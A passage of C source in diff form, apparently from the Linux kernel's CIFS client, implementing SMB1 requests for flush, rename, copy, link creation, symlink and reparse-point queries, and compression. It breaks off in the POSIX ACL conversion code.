++int
++CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon, int smb_file_id)
++{
++	int rc = 0;
++	FLUSH_REQ *pSMB = NULL;
++	cifs_dbg(FYI, "In CIFSSMBFlush\n");
++
++	rc = small_smb_init(SMB_COM_FLUSH, 1, tcon, (void **) &pSMB);
++	if (rc)
++		return rc;
++
++	pSMB->FileID = (__u16) smb_file_id;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_flushes);
++	if (rc)
++		cifs_dbg(VFS, "Send error in Flush = %d\n", rc);
++
++	return rc;
++}
++
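++/* Path-based rename via SMB_COM_RENAME */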
++int
++CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *from_name, const char *to_name,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	RENAME_REQ *pSMB = NULL;
++	RENAME_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSSMBRename\n");
++renameRetry:
++	rc = smb_init(SMB_COM_RENAME, 1, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->BufferFormat = 0x04;
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
++					      from_name, PATH_MAX,
++					      cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++		pSMB->OldFileName[name_len] = 0x04;	/* pad */
++		/* protocol requires ASCII signature byte on Unicode string */
++		pSMB->OldFileName[name_len + 1] = 0x00;
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       to_name, PATH_MAX, cifs_sb->local_nls,
++				       remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2;	/* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, from_name);
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
++		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
++		name_len2++;	/* signature byte */
++	}
++
++	count = 1 /* 1st signature byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_renames);
++	if (rc)
++		cifs_dbg(FYI, "Send error in rename = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto renameRetry;
++
++	return rc;
++}
++
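++/* Rename an open file by handle via TRANS2_SET_FILE_INFORMATION */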
++int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *pTcon,
++		int netfid, const char *target_name,
++		const struct nls_table *nls_codepage, int remap)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct smb_com_transaction2_sfi_rsp *pSMBr = NULL;
++	struct set_file_rename *rename_info;
++	char *data_offset;
++	char dummy_string[30];
++	int rc = 0;
++	int bytes_returned = 0;
++	int len_of_str;
++	__u16 params, param_offset, offset, count, byte_count;
++
++	cifs_dbg(FYI, "Rename to File by handle\n");
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, pTcon, (void **) &pSMB,
++			(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)(pSMB) + offset + 4;
++	rename_info = (struct set_file_rename *) data_offset;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000); /* BB find max SMB from sess */
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	/* construct a temporary name "cifs<mid>" if no target name supplied */
++	rename_info->overwrite = cpu_to_le32(1);
++	rename_info->root_fid  = 0;
++	/* unicode only call */
++	if (target_name == NULL) {
++		sprintf(dummy_string, "cifs%x", pSMB->hdr.Mid);
++		len_of_str =
++			cifsConvertToUTF16((__le16 *)rename_info->target_name,
++					dummy_string, 24, nls_codepage, remap);
++	} else {
++		len_of_str =
++			cifsConvertToUTF16((__le16 *)rename_info->target_name,
++					target_name, PATH_MAX, nls_codepage,
++					remap);
++	}
++	rename_info->target_name_len = cpu_to_le32(2 * len_of_str);
++	count = sizeof(struct set_file_rename) + (2 * len_of_str);
++	byte_count += count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->Fid = netfid;
++	pSMB->InformationLevel =
++		cpu_to_le16(SMB_SET_FILE_RENAME_INFORMATION);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, pTcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&pTcon->stats.cifs_stats.num_t2renames);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Rename (by file handle) = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
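++/* Server-side copy via SMB_COM_COPY */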
++int
++CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *fromName, const __u16 target_tid, const char *toName,
++	    const int flags, const struct nls_table *nls_codepage, int remap)
++{
++	int rc = 0;
++	COPY_REQ *pSMB = NULL;
++	COPY_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++
++	cifs_dbg(FYI, "In CIFSSMBCopy\n");
++copyRetry:
++	rc = smb_init(SMB_COM_COPY, 1, tcon, (void **) &pSMB,
++			(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->BufferFormat = 0x04;
++	pSMB->Tid2 = target_tid;
++
++	pSMB->Flags = cpu_to_le16(flags & COPY_TREE);
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->OldFileName,
++					      fromName, PATH_MAX, nls_codepage,
++					      remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++		pSMB->OldFileName[name_len] = 0x04;     /* pad */
++		/* protocol requires ASCII signature byte on Unicode string */
++		pSMB->OldFileName[name_len + 1] = 0x00;
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       toName, PATH_MAX, nls_codepage, remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2; /* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, fromName);
++		pSMB->OldFileName[name_len] = 0x04;  /* 2nd buffer format */
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, toName);
++		name_len2++;    /* signature byte */
++	}
++
++	count = 1 /* 1st signature byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in copy = %d with %d files copied\n",
++			 rc, le16_to_cpu(pSMBr->CopyCount));
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto copyRetry;
++
++	return rc;
++}
++
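++/* Create a symlink using the Unix extensions (SMB_SET_FILE_UNIX_LINK) */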
++int
++CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *fromName, const char *toName,
++		      const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	char *data_offset;
++	int name_len;
++	int name_len_target;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In Symlink Unix style\n");
++createSymLinkRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName,
++				/* find define for this maxpathcomponent */
++					PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fromName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)pSMB + offset + 4;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len_target =
++		    cifsConvertToUTF16((__le16 *) data_offset, toName,
++				/* find define for this maxpathcomponent */
++					PATH_MAX, nls_codepage, remap);
++		name_len_target++;	/* trailing null */
++		name_len_target *= 2;
++	} else {
++		name_len_target = copy_path_name(data_offset, toName);
++	}
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max on data count below from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + name_len_target;
++	pSMB->DataCount = cpu_to_le16(name_len_target);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_LINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_symlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetPathInfo create symlink = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto createSymLinkRetry;
++
++	return rc;
++}
++
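++/* Create a hard link using the Unix extensions (SMB_SET_FILE_UNIX_HLINK) */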
++int
++CIFSUnixCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *fromName, const char *toName,
++		       const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	char *data_offset;
++	int name_len;
++	int name_len_target;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In Create Hard link Unix style\n");
++createHardLinkRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len = cifsConvertToUTF16((__le16 *) pSMB->FileName, toName,
++					      PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++	} else {
++		name_len = copy_path_name(pSMB->FileName, toName);
++	}
++	params = 6 + name_len;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)pSMB + offset + 4;
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len_target =
++		    cifsConvertToUTF16((__le16 *) data_offset, fromName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len_target++;	/* trailing null */
++		name_len_target *= 2;
++	} else {
++		name_len_target = copy_path_name(data_offset, fromName);
++	}
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max on data count below from sess*/
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + name_len_target;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->DataCount = cpu_to_le16(name_len_target);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_HLINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetPathInfo (hard link) = %d\n",
++			 rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto createHardLinkRetry;
++
++	return rc;
++}
++
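++/* Create a hard link via an NT rename with the CREATE_HARD_LINK flag */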
++int
++CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *from_name, const char *to_name,
++		   struct cifs_sb_info *cifs_sb)
++{
++	int rc = 0;
++	NT_RENAME_REQ *pSMB = NULL;
++	RENAME_RSP *pSMBr = NULL;
++	int bytes_returned;
++	int name_len, name_len2;
++	__u16 count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In CIFSCreateHardLink\n");
++winCreateHardLinkRetry:
++
++	rc = smb_init(SMB_COM_NT_RENAME, 4, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->SearchAttributes =
++	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
++			ATTR_DIRECTORY);
++	pSMB->Flags = cpu_to_le16(CREATE_HARD_LINK);
++	pSMB->ClusterCount = 0;
++
++	pSMB->BufferFormat = 0x04;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->OldFileName, from_name,
++				       PATH_MAX, cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++
++		/* protocol specifies ASCII buffer format (0x04) for unicode */
++		pSMB->OldFileName[name_len] = 0x04;
++		pSMB->OldFileName[name_len + 1] = 0x00; /* pad */
++		name_len2 =
++		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
++				       to_name, PATH_MAX, cifs_sb->local_nls,
++				       remap);
++		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
++		name_len2 *= 2;	/* convert to bytes */
++	} else {
++		name_len = copy_path_name(pSMB->OldFileName, from_name);
++		pSMB->OldFileName[name_len] = 0x04;	/* 2nd buffer format */
++		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
++		name_len2++;	/* signature byte */
++	}
++
++	count = 1 /* string type byte */  + name_len + name_len2;
++	inc_rfc1001_len(pSMB, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
++	if (rc)
++		cifs_dbg(FYI, "Send error in hard link (NT rename) = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto winCreateHardLinkRetry;
++
++	return rc;
++}
++
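++/* Query a symlink target using the Unix extensions (SMB_QUERY_FILE_UNIX_LINK) */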
++int
++CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++			const unsigned char *searchName, char **symlinkinfo,
++			const struct nls_table *nls_codepage, int remap)
++{
++/* SMB_QUERY_FILE_UNIX_LINK */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++	char *data_start;
++
++	cifs_dbg(FYI, "In QPathSymLinkInfo (Unix) for path %s\n", searchName);
++
++querySymLinkRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   searchName, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_LINK);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QuerySymLinkInfo = %d\n", rc);
++	} else {
++		/* decode response */
++
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			rc = -EIO;
++		else {
++			bool is_unicode;
++			u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++
++			data_start = ((char *) &pSMBr->hdr.Protocol) +
++					   le16_to_cpu(pSMBr->t2.DataOffset);
++
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				is_unicode = true;
++			else
++				is_unicode = false;
++
++			/* BB FIXME investigate remapping reserved chars here */
++			*symlinkinfo = cifs_strndup_from_utf16(data_start,
++					count, is_unicode, nls_codepage);
++			if (!*symlinkinfo)
++				rc = -ENOMEM;
++		}
++	}
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto querySymLinkRetry;
++	return rc;
++}
++
++/*
++ *	Recent Windows versions now create symlinks more frequently
++ *	and they use the "reparse point" mechanism below.  We can of course
++ *	do symlinks nicely to Samba and other servers which support the
++ *	CIFS Unix Extensions, and we can also do SFU symlinks and "client only"
++ *	"MF" symlinks optionally, but for recent Windows we really need to
++ *	re-enable the code below and fix the cifs_symlink callers to handle this.
++ *	In the interim this code has been moved to its own config option so
++ *	it is not compiled in by default until the callers are fixed up and it
++ *	is better tested.
++ */
++int
++CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++		    __u16 fid, char **symlinkinfo,
++		    const struct nls_table *nls_codepage)
++{
++	int rc = 0;
++	int bytes_returned;
++	struct smb_com_transaction_ioctl_req *pSMB;
++	struct smb_com_transaction_ioctl_rsp *pSMBr;
++	bool is_unicode;
++	unsigned int sub_len;
++	char *sub_start;
++	struct reparse_symlink_data *reparse_buf;
++	struct reparse_posix_data *posix_buf;
++	__u32 data_offset, data_count;
++	char *end_of_smb;
++
++	cifs_dbg(FYI, "In Windows reparse style QueryLink for fid %u\n", fid);
++	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->TotalParameterCount = 0;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le32(2);
++	/* BB find exact data count max from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 4;
++	pSMB->Reserved = 0;
++	pSMB->ParameterOffset = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 4;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->FunctionCode = cpu_to_le32(FSCTL_GET_REPARSE_POINT);
++	pSMB->IsFsctl = 1; /* FSCTL */
++	pSMB->IsRootFlag = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	pSMB->ByteCount = 0;
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QueryReparseLinkInfo = %d\n", rc);
++		goto qreparse_out;
++	}
++
++	data_offset = le32_to_cpu(pSMBr->DataOffset);
++	data_count = le32_to_cpu(pSMBr->DataCount);
++	if (get_bcc(&pSMBr->hdr) < 2 || data_offset > 512) {
++		/* BB also check enough total bytes returned */
++		rc = -EIO;	/* bad smb */
++		goto qreparse_out;
++	}
++	if (!data_count || (data_count > 2048)) {
++		rc = -EIO;
++		cifs_dbg(FYI, "Invalid return data count on get reparse info ioctl\n");
++		goto qreparse_out;
++	}
++	end_of_smb = 2 + get_bcc(&pSMBr->hdr) + (char *)&pSMBr->ByteCount;
++	reparse_buf = (struct reparse_symlink_data *)
++				((char *)&pSMBr->hdr.Protocol + data_offset);
++	if ((char *)reparse_buf >= end_of_smb) {
++		rc = -EIO;
++		goto qreparse_out;
++	}
++	if (reparse_buf->ReparseTag == cpu_to_le32(IO_REPARSE_TAG_NFS)) {
++		cifs_dbg(FYI, "NFS style reparse tag\n");
++		posix_buf = (struct reparse_posix_data *)reparse_buf;
++
++		if (posix_buf->InodeType != cpu_to_le64(NFS_SPECFILE_LNK)) {
++			cifs_dbg(FYI, "unsupported file type 0x%llx\n",
++				 le64_to_cpu(posix_buf->InodeType));
++			rc = -EOPNOTSUPP;
++			goto qreparse_out;
++		}
++		is_unicode = true;
++		sub_len = le16_to_cpu(reparse_buf->ReparseDataLength);
++		if (posix_buf->PathBuffer + sub_len > end_of_smb) {
++			cifs_dbg(FYI, "reparse buf beyond SMB\n");
++			rc = -EIO;
++			goto qreparse_out;
++		}
++		*symlinkinfo = cifs_strndup_from_utf16(posix_buf->PathBuffer,
++				sub_len, is_unicode, nls_codepage);
++		goto qreparse_out;
++	} else if (reparse_buf->ReparseTag !=
++			cpu_to_le32(IO_REPARSE_TAG_SYMLINK)) {
++		rc = -EOPNOTSUPP;
++		goto qreparse_out;
++	}
++
++	/* Reparse tag is NTFS symlink */
++	sub_start = le16_to_cpu(reparse_buf->SubstituteNameOffset) +
++				reparse_buf->PathBuffer;
++	sub_len = le16_to_cpu(reparse_buf->SubstituteNameLength);
++	if (sub_start + sub_len > end_of_smb) {
++		cifs_dbg(FYI, "reparse buf beyond SMB\n");
++		rc = -EIO;
++		goto qreparse_out;
++	}
++	if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++		is_unicode = true;
++	else
++		is_unicode = false;
++
++	/* BB FIXME investigate remapping reserved chars here */
++	*symlinkinfo = cifs_strndup_from_utf16(sub_start, sub_len, is_unicode,
++					       nls_codepage);
++	if (!*symlinkinfo)
++		rc = -ENOMEM;
++qreparse_out:
++	cifs_buf_release(pSMB);
++
++	/*
++	 * Note: On -EAGAIN error only caller can retry on handle based calls
++	 * since file handle passed in no longer valid.
++	 */
++	return rc;
++}
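++
++/*
++ * Sketch of the NTFS symlink reparse parsing above (offsets assumed
++ * for illustration): the target string lives inside PathBuffer at
++ * SubstituteNameOffset and runs for SubstituteNameLength bytes, so
++ * with offset 0 and length 20 the target is the first 10 UTF-16 code
++ * units of PathBuffer.  The check (sub_start + sub_len > end_of_smb)
++ * rejects buffers whose advertised offsets would walk past the end of
++ * the received SMB.
++ */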
++
++int
++CIFSSMB_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		    __u16 fid)
++{
++	int rc = 0;
++	int bytes_returned;
++	struct smb_com_transaction_compr_ioctl_req *pSMB;
++	struct smb_com_transaction_ioctl_rsp *pSMBr;
++
++	cifs_dbg(FYI, "Set compression for %u\n", fid);
++	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	pSMB->compression_state = cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
++
++	pSMB->TotalParameterCount = 0;
++	pSMB->TotalDataCount = cpu_to_le32(2);
++	pSMB->MaxParameterCount = 0;
++	pSMB->MaxDataCount = 0;
++	pSMB->MaxSetupCount = 4;
++	pSMB->Reserved = 0;
++	pSMB->ParameterOffset = 0;
++	pSMB->DataCount = cpu_to_le32(2);
++	pSMB->DataOffset =
++		cpu_to_le32(offsetof(struct smb_com_transaction_compr_ioctl_req,
++				compression_state) - 4);  /* 84 */
++	pSMB->SetupCount = 4;
++	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
++	pSMB->ParameterCount = 0;
++	pSMB->FunctionCode = cpu_to_le32(FSCTL_SET_COMPRESSION);
++	pSMB->IsFsctl = 1; /* FSCTL */
++	pSMB->IsRootFlag = 0;
++	pSMB->Fid = fid; /* file handle always le */
++	/* 3 byte pad, followed by 2 byte compress state */
++	pSMB->ByteCount = cpu_to_le16(5);
++	inc_rfc1001_len(pSMB, 5);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetCompression = %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	/*
++	 * Note: On -EAGAIN error only caller can retry on handle based calls
++	 * since file handle passed in no longer valid.
++	 */
++	return rc;
++}
++
++
++#ifdef CONFIG_CIFS_POSIX
++
++/* Convert an Access Control Entry from wire format to local POSIX xattr format */
++static void cifs_convert_ace(struct posix_acl_xattr_entry *ace,
++			     struct cifs_posix_ace *cifs_ace)
++{
++	/* u8 cifs fields do not need le conversion */
++	ace->e_perm = cpu_to_le16(cifs_ace->cifs_e_perm);
++	ace->e_tag  = cpu_to_le16(cifs_ace->cifs_e_tag);
++	ace->e_id   = cpu_to_le32(le64_to_cpu(cifs_ace->cifs_uid));
++/*
++	cifs_dbg(FYI, "perm %d tag %d id %d\n",
++		 ace->e_perm, ace->e_tag, ace->e_id);
++*/
++
++	return;
++}
++
++/* Convert ACL from CIFS POSIX wire format to local Linux POSIX ACL xattr */
++static int cifs_copy_posix_acl(char *trgt, char *src, const int buflen,
++			       const int acl_type, const int size_of_data_area)
++{
++	int size =  0;
++	int i;
++	__u16 count;
++	struct cifs_posix_ace *pACE;
++	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)src;
++	struct posix_acl_xattr_header *local_acl = (void *)trgt;
++
++	if (le16_to_cpu(cifs_acl->version) != CIFS_ACL_VERSION)
++		return -EOPNOTSUPP;
++
++	if (acl_type == ACL_TYPE_ACCESS) {
++		count = le16_to_cpu(cifs_acl->access_entry_count);
